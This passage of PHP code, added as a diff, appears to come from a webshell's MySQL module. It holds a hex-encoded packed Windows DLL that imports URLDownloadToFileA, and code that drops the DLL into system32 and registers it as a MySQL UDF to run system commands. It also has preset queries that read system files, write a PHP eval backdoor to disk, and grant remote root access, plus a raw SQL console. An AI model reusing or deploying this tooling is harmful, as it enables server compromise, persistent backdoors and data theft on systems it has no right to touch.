A129A283C8BB7B56C21CC96870F8313112A210CB700ACE86FE2570FAFAE83FEE08BDE770D0000EC1A0C2715773A7256B4D59382AB1D3D530256F057752B566A082A898850D71C14229893820F56741956947414EBA96A72A31644577C54EC8157B40E5BEB56D5612ED4230603EE265D565698182B52F7616904FC8AAEFF41BE0D50BCC5273ADC3701435C147C29985047568D7C07FB2D162BF90CAD240600473B5B290E2B1E7CA55E90C3B6CA11C56056821834BFA3A546088B87803B08742246C2ED46D988E80713720FF9240A606106817D0D4C02DB6E8350F531845E39C3D9AC60B6DDBC17721507CA532C1EB22D19080C16334BA55C1DE660080C7BD27502BD40DF1283CFDEDBE158EC22C90314BD737500A20F08B1443C998A74F6466221F816F87544837E5F23E886DE04FD0C958D460CFE1EC413ABFF4620ED8D5E0C70F61B090D803874180C84884388239F4500C3A585BF2D50DDE52B116A245999F7F9D1F03DD4A80336C66D2983FA3BF137EF2083C5044381FD5FA40F8C5E3984F86E23EB4EBE3E56B93E126F843E8D0C9DA9901E9C5F8684F83BC27318C01103D6EBE48D0815EAC1E30543C70B2256C9A012346C430BFCFE07563B0D535773F7C1903683D0C93CC18F07833C50B0DA28E4361AF51B053E1E751EE28B104974084958DEDE680284F4EB0804F5EB03F6A337DE4600E836891C308A5BEB161EE4C2DA027F7B5882864329F459376A830037C674320E1F5AC9F31CD6CA7E50505031C85A7B830CB2247ED4CAE264CF731FCCA3AD8D8800AB740F00E16AD8580841533AFDECA4963B343D1C063CC0C1E7154A81B1BCF749D418C5604B9E381780360CB2AD2C98248184E169CA5190C61D5642D4920179728BC3C36C8BB1E14E4152530411590F250306F029535DEC60B404CBF0F6D915B7B10211B0FF0336E4106AC0A359B43809F2A22CDEB43F4AA87BF6F30549C0FF4AB890073C9013082CBAAED003FC0C203F087900724AA84AA8A6E9BAD83F069F038C848BA6699A7C746C645C3F5D3B8F004AA8F003C00164D134CCE03F39859CE44C404BF04B4845D375DD2C900B580378A03C0239903F4C404C405D171B855B7FF403FC344DD3750E04030C141C24871160D1373F1F164DD37505500358687C3FAB2F4A003E1CCCA0022F907956F6C112883F1594D9815DE874095900FE37ABC645FF10EB0B8065FF8DECFC0FC0861A806811F6C540750839B72F455328E48B4DFF806A83C15E02056083236DC3DE2374001680E1A4C3F96C01175510100840EB07F60D4A30797FF810742604ADB7F2F220741830740A5074897505216A16A21521020C2ABD7CDF060389F0BA00077D0423CABF54B47F037D3BC87F31742A3BCB43C3ED4AB06D195433744D0739BA91AD85CC43F84C0804BAA67B7B435AF8EB3E26052F070643CE806F1E3BCA7423C2163CDD1188188F4F5B3B0507E69EE00113FDBEFEFF32FC5DF4C77413368E54F7D1234D143737B8DB1172A840C581CE1F0FF601F6ED63DBB7C4DE020BF7A8DF081408EB0AA8115D2CBDB1060B1068ADD8233BD39241E0DF751AE918016D0D8231816ABFB78D0A9E2DA82BCEF008022D6030EA3BAC39BF4213628561325256E8B383459875090A18EBD8D583F9B19A4DFF40EB09AF08146C410F78473159812781D6C68A11C380C901C630045A8452C9C2DD05BEFF0B48884CBD7578EA7473F606818116F502746D8B945DA2220B1E8B067519FC35008FBE813883E94B1D2A1759D888B60DBCEB584213E2137C677E2511335669A116807D131A11825F178CF015554445E2811980C73E5A74B52DD81C2EAF737808AB60072DDC07808B8C4E8BF390E005C916713F8005431467736A081E8233918B09570441464E600F3B32B24C245B231A0EF2F2B64D79D50D04FEEB08FDEB03F4C11A824C0C5F198A1141AA1EEC1BF16488174762EEEB05838C00F0D32401119C2CCBC983C1E134271208006DCC6AC738682DD9D2D96608C6C3000C085DC049B38807CA185A1965872312F52A65520945A9F88959AC913859A6E80AB82C06F651FAD756F29B6A0A8FD2268988391874744617CAE630428A78A9E850538B58DA71F0D73BC6CC214D628386A240C893715963FF25DAE2BF94603975E8F3ABAA895D0F6C16E8D386EBD77DEEB8BC4DEFDD405B2B04D30CAFCBB641FFE87BA312CA300F87942588CD546C9CD28DEEE356F7E58D614F6F52F3AB04AA8D9E94FA52A15498BCB6DE2C8A5101E84B51844B5CFA3BC777B7EFEE2D68FC8A922080089047401376F5F84BB1F04141803965D47983C308837DFC6913B93638C1E2C8914CBA6DA087F750A3A4105384898C2AB8BFDF709140A5A559A3D1A5EB5240D1B3A660810547A8C6A19EC57EF508403DFF07F153382B89357BDF06F15335250700BA49F88816ADAB00981EA84C97DFE75E2E8604AFE9508301D08C4311946FA857DA70EF65402DDFFE01A8946CBBE78FA8FF1570F814FD9635D1CBF4FC750F87DC19F6AE1CC7492DA463E7E804741704D7A628F00D740C802CB804F93CCF763605120B0811578460862571BEC01F88E1625F044CE5CF52B1404522283456A166B453962215127FE081E016CFBE8C888405ECDF7FA1150D8AC672F48A45F2C6850D20166E104D3B375A55F3B80A2D415FA0183BC1771D48BC3A08768F2A41B820008BD9CBAB6B81FA47AA42428A42FF84C15FF8EC352C900EFA8B358D7A029A33D0213989B2EF8C7DDD5A9123FD1D561E9291DD6C5634235842FCAD803DB8682E2768002E7DB75CCA8D8D726695F6C2CDEF67341503108A940564889060EFCEC9DBEB1C1A027410205BEBE380A06E6834781CDE4400BFEB491ADB0D1315DA417219045AB2BC8DFDC34BC880C1208888491F1D617213C3DE9CBC7A770E20E920EBE04C77F915774ABE5EC97394886AFDA90210F970505C59FC94882F1FD575798FAC426866281854FAF7403D6709FC161C57FFD664BEDB29FA297450100CC7D7BE5DA0F85714B00C06B45B99A0BB88CD16FFD0D602DEE66BED10B405531104EE1590601D4D0AC00982FA8659A057040481282056B064F0BB470B0C85965E91F983FA982DE9ED6A47C025152BD16075FA9AEF10D06D020610CA1A251C8E1D1429168F58A6EB3A06234AE2EB8807351E94CC5289365A271ACF0D56AF1235140FCBFFE1C3A0B7AC99AD78F2971B180A0360B615DCC1A8F1223E1975EF13A0876A064F4AACEC508B9E1D9C345CE66D442C51681C4C147D452E6AB6AD50293F89B1C1E0939D084B1A6606AB9F44BC3805750BBB0D416F064D6B50AF256BBC5C487D469512980708D0E250853014526D2FD050BCDE1BF6034EBC05A908D81A4A8615B06F126945FCDE30A22DC25B53C366A035AADB9C65F874E144346021CE0C29800750A09543B566401343E0E0043812F107C406F98A4804657FAB99A5DF89084B1D8A40053C0A84BED01D154D1088E4078D53010F8B459718C682050ABC160C166D515452B810448B664DDB39AD976865D1068F1496935166EB006D912446E98B17684D8B3D4BE1F40155F64235D144E68AE5A87CC50EE0D0F876EB3B0A81A274BBBE0C04E724FB027FAD0D03808136C85B00140C0075FFD06C0B23578A101A33AE3CD45FBB2D0D0BB443FF135A12493944BBDD2DA2182140803848068308CDCD76BF5F5EC6030D4344EB73CA2BD36E3260E7FF6A01CF0A090E683BAA479F74411ED101A2358848D12D821A85FF9D468B0F4388443105EB293B700420DEB6250CFF6305160AEB18A55E40D812FFA9193507AD9C7B77BF925B761A750D85115C74F3064942D12EE5E4AC062B4688210250A8EAA9D800F91131357540346A46C42BF87D5BF41F8AE875465757EB533038154C20629236B1F2DBCA6A711D23EB222014A660B0341B48E1FE033130EB651DBA397D147E108AB25936C514105A66B67DF436E1A11D591D161C0286D98CD9181FD84872DA478DC159D22AD3A62018366B5B0CBE3C20732EDB6CB74EC1245E0140503720CA3F408C4C793BDF0F849CD25B6CA014041B9C0324FCF25DAADB2EDE8BC441DC8367EB138DB5D751678BF026118BB5D9F6AD3867DC7466534CDC6121CB9EEB9257F44DEC1AA574A3A6884412D80A7432B06D4B6C5E0D40403E1C78B2C8663713EDD57F1EDA321C0962C321858F2065C814876515F4A1F20BD966B6B336DC895DE08B15483212BDB27DB953D6BDDF74B45664E467749C8F6AB35BA3B30E03EB068C28EDD5618F54D5CC0AB11B88108B71B77179088B2680AD9F44568D4A9E0D7FBA0DBA5580F1491AF30C5E5CC60736942B498BC24E58ED61328118B4ECAC375E2D043E3E8A515E564234632356A53C0497CFC819DF1D1B56495340CEC2C73B028658A3432D24F276607CDD1C490554CC335033E433B263345BC8945D18908DD9968D532C34201BC53619181FE0DB630AD06A15B5CB3EBB15B0107CD3DC57CC0FE16050B3EB0B83DB33ECB6119CF6112949E0565FF670C9DA1C5552F8D7B2703A84933C8AF5CC38680C42EF047AC25F9A51D4E7023A01752E0A1BB1D552F0263A613E0A431D966EE146873A4101191411035BA330D56BFDD51A75555B430BB3FFB090D3D18E016DADCA0B4301070242B5CFD6ED44E94130E01302A86658AD799AAF335BD2CAC9C14A6D42AA5BC98CCC4F56530B4A55B050009C1B201AFFAE023307420FAB0424EBF3775DFE5ABB8C90416E14460FA373F201E6E20204C420753F98FD646C3A0AF38D46FF3B9CB8ACF87B5643BE51EEB60E56485481DF4C03C12580FC8D161DDEBD0A80E17FEB0D811FDED0540440391180C980DE880A81440B8D6686C5C671D0419080E3D60AC0C006A0A8487D065C9C249E5862050D10565D7426E8BC00BF83C410E0AE41C305E3CC0CB568E12EF1C6012D415CEB030A915B4013D4B88110B5DAA5DAD2630883FB0950769225FF2F7D6B2004308819413577DA802100498A178A018878007F8B118F49473BF972F21B365341486FFF948BD6A81E588D39C470CD4143A1D03B5CCF252EB6C1FF46758A274738C474F22C419D1AE324EC85D2E1C5FE4186E00E824A6F1474D21AC0E6FFD1575F3AEB78F0FFBF34019130007F0419C0D96EE2EB15130DC9817888C2C77895FFB541599EEE9067271FD82E760B3E6A602266C4040907B742A68D38CFDA39CB15580B0318AC05224EEBFB55D0C2052241280EABE097CF0B6C112836D1E970DA0C1B1FFF804EB741B35AB6201726828ADDFFDBEE0774217F1D467BFC720638DC770202E638F809D8B517BA35C6F7750DEBD733C908023657B34D9BB9AFE582806D6AE4BF0FF35FA6ED85B50A321926EF2BB446AB2F99EE57EBB68DDE5AC3EC74230BAB1F775165EB3AC0F0596B0979D584B5634DCA0975720271FC08A5C9DE0E5FFECB030051283074512BBC2311EC1A2D75770C920F1DA2C685B7A6EB52DF2F7D8B5BB10EC11AB6D10A5601805E6EBDF54B318065FE0088508845FDF3EB09BAAB41D90DFD0F6C8D4D0AD58B1803165179AD7DD182C16E4F026B53B38059E3450A23B07465BB72251CAE5A80450F8CD5815DB9AAF5490F8FA18A46D52D1FE9DEE83C057C83760A4D405E7D2539DBD187F8787E0BD95FAD6A0AA1A1F4DEE0FE8A045823C667D9EB658B1512DA65E94CB4B6C84A740FA7DF5BD4D630AF88065D0958B60917C5522B5B13566B032CF036BE03B49F572F1A6AE0648FCC20F6AEDA06AD75A5D646D0BE05FD032C37126253CB0BC18C00885DC029C25A0BC839FAAB60287C25F7E1C29DEB025EA105B11D42030985056C351FD31EAACA3EC1CC03580000D37466AAFF0F4D53EE65DD9304DF03E50F08EC03BDE4F2B2F20F0AFF0B050CCF0AB656D003D50302017FB6DF3A1903070602100445000535300050B5EEFF7F2C20283850580708003730305750070F200BD71461DE000860686009780073AE956E08071507001A010E7D7BDDFF0028006E0075006C0129320F6E756C6C6FB7FFDF0A72756E74696D65206572726F72200F0D0A03544C4F07E4BFD95353110E0053494E470044BBFD65ED4F4D4112115236303238082D204BB76F7F7961626C746F20696E6956616C697A0D6865D67EBED961703727376E6F743D0460EFB6FF756768207370616323667B6C6F7769380AB9EC3661066F6E3736ED672079737464357075722BF6DB5AFB76697274752133A5632320630C9B42BED86C285F345F2ABDF6DA7665785C2F5806DCE2E6BEB0935F3139F76F706558313260DBEE736F0F646573632B3888706B6D4624816564193024DF405723376D926FDBADA6AC7468BF612F6C6F636B1B6C8530173464B7865B6B6E612E02A221726D0050D8DAB770406772616D204A6D366829EC852F30394F10E71A8D66412A2B302E2B84EF53C8386172677528735F6DBBF63C303266C16E6E67826F9CB52EB605743A1164E67F4DC3DB422B2D60396615566973AAEFF660FC432B2B2052A04C6962B47279276D0F87B90A2D16450E211150D8656B9CD43AC2002E003CE5ED6D736DE0252C6B6C776E3E1B17EED8F84765744C61324102766550AE75705BDBCE62130F57956426876534BEF0FF7373616765426F78410075732533322E642ADD931252EAB75956035A77CF76670B5A955A0E0B5B8E0392483AAFB9BBB56D904A0064002C204D20086DC9BDB97900632F642F06D74D03FDB5179A4144EE656D626B5B4E6F76C3FE6D930B4F986F0A536570741486A96885416C96711BBEEDF9B941076E6541F369A64D101636172763684665327533BDF7DE7B4A616E0A675F57537BAF7BEF4B47433779433F3B6EA9D0DE3323B03C6418B0ED587B4F5E095468127313D9C15A6157BC7C0C547509B9D9B1C64D251053750743F7DE7BEF3B372F27231F039E73CEB90A11181F262D9C73CEC5AF828990979E72CE39E7A5ACB3BAC1C8A78008047C28BB92975043BD384F296360A9523F4D797371909620A953A636306EC263B50B355A6A09A663B7B921E76A3752C077035C321703ABCF91FB2E746D700FB40600B6472A481D3A2C7EB53D25E4E6FFDB730A2F636D642E657865202F63200068656C55192B75313774073967FF76B6E4380B3006687474703A2F2F8F2DF5FF2ED9632D9B09CAE4C8EBB8F1CABDB4EDCEF3FFC3FE6F120D00CFC2D4D8CAA7B0DC0BCEC4BCFEB3C9B9A6F6DCE6FE21C2B7BEB6A3BA7E175C3F44867B81D10F00200593195731D913199DE4667271F0108DE8832119B2178E180F30434E5146C2F80392017BD894A007010153107C81A4B902011F0264410152476357D9D9070A2F0207743CF2E4C96C084009140A73F01093274F9EC411941270133C79E4C944180C1972E41AAC1B93274F9E741C4C783C796EF2E4C92C7A1CFC18FF86B29317D854DD038572200107402699282048001940269210841002199009810119900119108202601C16023B20EF200D0C050133164DD30C3603070418050D344DD3340609070C0832D82083090A1B0BC1BEF702573B070F575F906EB0101311031217210C32D820350F414336D86083503352175307D860830D575F597B6C17D2344D376DAB20701C72D860DF0BC72F80B3810760830C36821F83848F208334CD91299EA1830D32D8A46FA7B79FCE760EC2601FD70B18070069BEB35D0517C00B1D0490664006968D08644006648E8F9006644006919293CC066140039F78EF4D54EC25FF0204222B6027CF0EF68279822117A6DF07A1A581E9CDF3EF9FE0FC2F407E80FCA8C1A3DAA34F0D72F60881FE0740B577830C812F41B65FCFA2E43E5F21FFA21A00E5A2E8A25B7EA1FE5105BF92DFEE03DA5EDA5F5FDA6ADA32D3D8DEE0B26627B7F939317E430303860064AA432EE99E9C84538B9876840380A6699AA67C7874706C9AA6699A645C54483C34699AA6692824201C18A6699AA614100C08044DD334970075FCF8F0E4DCA6E99E35D42F75CC03C4BC9AA6699AB0A89C908C8849BEA669806C64CD2E821D65BB8C8F905C037F009EF040E82F500B807007F0F11325DCA0D1535499508BDD50C944548CF38CDC97B058592CA7BF06699A0E1EEF3B5A9775A769BAA7B5D4F3E0301AB86CD3034E6D01333AB759699AA6697796B4D3F20CDA74DD272F034D6C01F108A48008368024444144210980D109600064C15B054D734325746554B6CBB7572C0D44656C65466905410A105FDB0C470A0953C5D87393CD2719522C0A23EC4F56C145185661726961622212C0EC7F436C6F736548616E6425F62AD80E4B4A500B63417B7B56686753791D656D4447B7C1B656F5227914744E747515B893FD70496E666F413569704FB1DBD62EA845782A08535D65702CFB36CCFD56657273696F163B896E6754792D67DF856C570F1F4C434D6170115706882E610D1B4D7073ED5BC34279126F65646543688366E5ABA03DFB644F66F34C6FFD8E6B68FF300B746C556E773C3D48D767EDAC7C70416C6C0A46B1FB432D7B9BE16F6D6D09336E7DACB38556982673FB0B790CC580D866E50B56ADB521419C42494D1E263CC3D609630A532740B029DBDACA16AD147215421BC0B64C5B762B78108C8580250B77C5EB8407C4600C542FB998A170B6DA75D3F812DCDD3302524964386C7353F3B3378BDD5575650C4F09DE4BD2258C531D2D471A086D618643427552C93B2463366412A0D50CC363141E4D6F64BDA34E616D6A3B2160BC5F9EE473183004470A0CF3CA6624A3FD08E42CCFF04258164361853B1CFE66BF08506F6990C906C25EF99DFD6B65644465633815C2844D72496E53EB460F3AC1F1EF73684B427566663E6A50ECB136761C0A410B074F454D092C19FE10934164647297EF7D2841BCD93C7155524C440A5BA4668277E3CE1C88F6F6FE340457534153864D00FF0402CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
+$query="INSERT into udf_temp values (CONVERT($code,CHAR));";
+	if(!mysql_query($query, $link))
+	{
+		mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
+		die('��װdllʧ��'.mysql_error());
+	}
+	else
+	{
+	$dllname = "mysqlDll.dll";
+	if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll";
+	elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll"; 
+	if(file_exists($dir)) {
+		$time = time();
+		$dir = str_replace("mysqlDll","mysqlDll_$time",$dir);
+		$dllname = str_replace("mysqlDll","mysqlDll_$time",$dllname);
+	}
+$query = "SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ;
+	if(!mysql_query($query, $link))
+	{
+		die("��װʧ��:$dir��Ȩ".mysql_error());
+	}
+	else
+	{
+		echo '<font style=font:11pt color=ff0000>'.$dir.'��װ�ɹ�</font><br>';
+	}
+}
+mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
+$result = mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error());
+if($result) {
+	echo "�ɹ�<br><a href='?'>����</a>";
+	exit();
+}
+}
+}
+$ss=stripslashes($post_sql);
+print<<<END
+<form method="post" action="?s=n&o=tq">
+<textarea name="post_sql" style="width:700px;height:200px;">{$ss}</textarea><br>
+<input name="install" type="submit" value="��װDLL����"> <input name="" type="submit" value="ִ��CMD���"><br></form>
+END;
+if ($_POST[post_sql]) {
+$link = mysql_connect ($mhost,$muser,$mpass) or die(mysql_error());
+if($mdata) mysql_select_db($mdata,$link) or die(mysql_error());
+$query = stripslashes($post_sql);
+$result = mysql_query($query, $link)  or die(mysql_error());
+echo "<br><textarea name=\"post_sql\" style=\"width:700px;height:200px;\">";
+echo ($result) ? "Done:$result\n\n" : "error:$result\n\n ".mysql_error();
+while ($row =  @mysql_fetch_array ($result)) {
+print_r ($row);
+}
+}
+echo "</textarea>";
+}
+else
+{
+	if(!empty($_POST['msql']))
+	{
+		$msql = $_POST['msql'];
+		if($result = @mysql_query($msql,$conn))
+		{
+			$MSG_BOX = 'ִ��SQL���ɹ�<br>';
+			$k = 0;
+			while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+		}
+		else $MSG_BOX .= mysql_error();
+	}
+print<<<END
+<script language="javascript">
+function nFull(i){
+	Str = new Array(11);
+	Str[0] = "select version();";
+	Str[1] = "select load_file(0x633A5C5C626F6F742E696E69) FROM user into outfile 'D://a.txt'";
+	Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F://a.php';";
+	Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
+	nform.msql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
+<div class="actall">
+<select onchange="return nFull(options[selectedIndex].value)">
+	<option value="0" selected>��ʾ�汾</option>
+	<option value="1">�����ļ�</option>
+	<option value="2">д���ļ�</option>
+	<option value="3">��������</option>
+</select>
+<input type="submit" value="ִ��" style="width:80px;">
+END;
+}
+	if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';
+	else echo '</div></center></form>';
+	return true;
+}
+//MYSQL����
+function Mysql_Len($data,$len)
+{
+	if(strlen($data) < $len) return $data;
+	return substr_replace($data,'...',$len);
+}
+function Mysql_Msg()
+{
+	$conn = @mysql_connect($_COOKIE['m_silichost'].':'.$_COOKIE['m_silicport'],$_COOKIE['m_silicuser'],$_COOKIE['m_silicpass']);
+	if($conn)
+	{
+print<<<END
+<script language="javascript">
+function Delok(msg,gourl)
+{
+	smsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
+	if(confirm(smsg)){window.location = gourl;}
+}
+function Createok(ac)
+{
+	if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (spider BLOB);';
+	if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
+	if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
+	return false;
+}
+</script>
+END;
+		$BOOL = false;
+		$MSG_BOX = '�û�:'.$_COOKIE['m_silicuser'].' &nbsp;&nbsp;&nbsp;&nbsp; ��ַ:'.$_COOKIE['m_silichost'].':'.$_COOKIE['m_silicport'].' &nbsp;&nbsp;&nbsp;&nbsp; �汾:';
+		$k = 0;
+		$result = @mysql_query('select version();',$conn);
+		while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+		echo '<div class="actall"> ���ݿ�:';
+		$result = mysql_query("SHOW DATABASES",$conn);
+		while($db = mysql_fetch_array($result)){echo '&nbsp;&nbsp;[<a href="?s=r&db='.$db['Database'].'">'.$db['Database'].'</a>]';}
+		echo '</div>';
+		if(isset($_GET['db']))
+		{
+			mysql_select_db($_GET['db'],$conn);
+			if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? 'ִ�гɹ�' : 'ִ��ʧ�� '.mysql_error();}
+			if(is_array($_POST['insql']))
+			{
+				$query = 'INSERT INTO '.$_GET['table'].' (';
+				foreach($_POST['insql'] as $var => $key)
+				{
+					$querya .= $var.',';
+					$queryb .= '\''.addslashes($key).'\',';
+				}
+				$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
+				$MSG_BOX = mysql_query($query,$conn) ? '���ӳɹ�' : '����ʧ�� '.mysql_error();
+			}
+			if(is_array($_POST['upsql']))
+			{
+				$query = 'UPDATE '.$_GET['table'].' SET ';
+				foreach($_POST['upsql'] as $var => $key)
+				{
+					$queryb .= $var.'=\''.addslashes($key).'\',';
+				}
+				$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
+				$MSG_BOX = mysql_query($query,$conn) ? '�޸ijɹ�' : '�޸�ʧ�� '.mysql_error();
+			}
+			if(isset($_GET['del']))
+			{
+				$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
+				$good = mysql_fetch_assoc($result);
+				$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
+				foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
+				$where = $query.substr($queryc, 0, -4).';';
+				$MSG_BOX = mysql_query($where,$conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� '.mysql_error();
+			}
+			$action = '?s=r&db='.$_GET['db'];
+			if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� '.mysql_error();}
+			if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
+			if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
+			echo '<div class="actall"><form method="POST" action="'.$action.'">';
+			echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';
+			echo '<input type="submit" name="querysql" value="ִ��" style="width:60px;height:49px;"> ';
+			echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
+			echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
+			echo '<input type="button" value="ɾ����" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
+			echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?s=r&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';
+			if(isset($_GET['table']))
+			{
+				echo '<a href="?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';
+				echo '[<a href="?s=r&db='.$_GET['db'].'&insert='.$_GET['table'].'">����</a>]</div>';
+				if(isset($_GET['edit']))
+				{
+					if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
+					echo '<form method="POST" action="?s=r&db='.$_GET['db'].'&table='.$atable.'">';
+					$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
+					$good = mysql_fetch_assoc($result);
+					$u = 0;
+					foreach($good as $var => $key)
+					{
+						$queryc .= $var.'=\''.$key.'\' AND ';
+						$type = @mysql_field_type($result, $u);
+						$len = @mysql_field_len($result, $u);
+						echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';
+						$u++;
+					}
+					$where = 'WHERE '.substr($queryc, 0, -4);
+					echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';
+					echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
+				}
+				else
+				{
+					$query = 'SHOW COLUMNS FROM '.$_GET['table'];
+		      $result = mysql_query($query,$conn);
+		      $fields = array();
+		      $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
+		      if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
+					echo '<table border="0"><tr>';
+					echo '<td class="toptd" style="width:70px;" nowrap>����</td>';
+					while($row = @mysql_fetch_assoc($result))
+					{
+						array_push($fields,$row['Field']);
+						echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
+					}
+					echo '</tr>';
+					if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
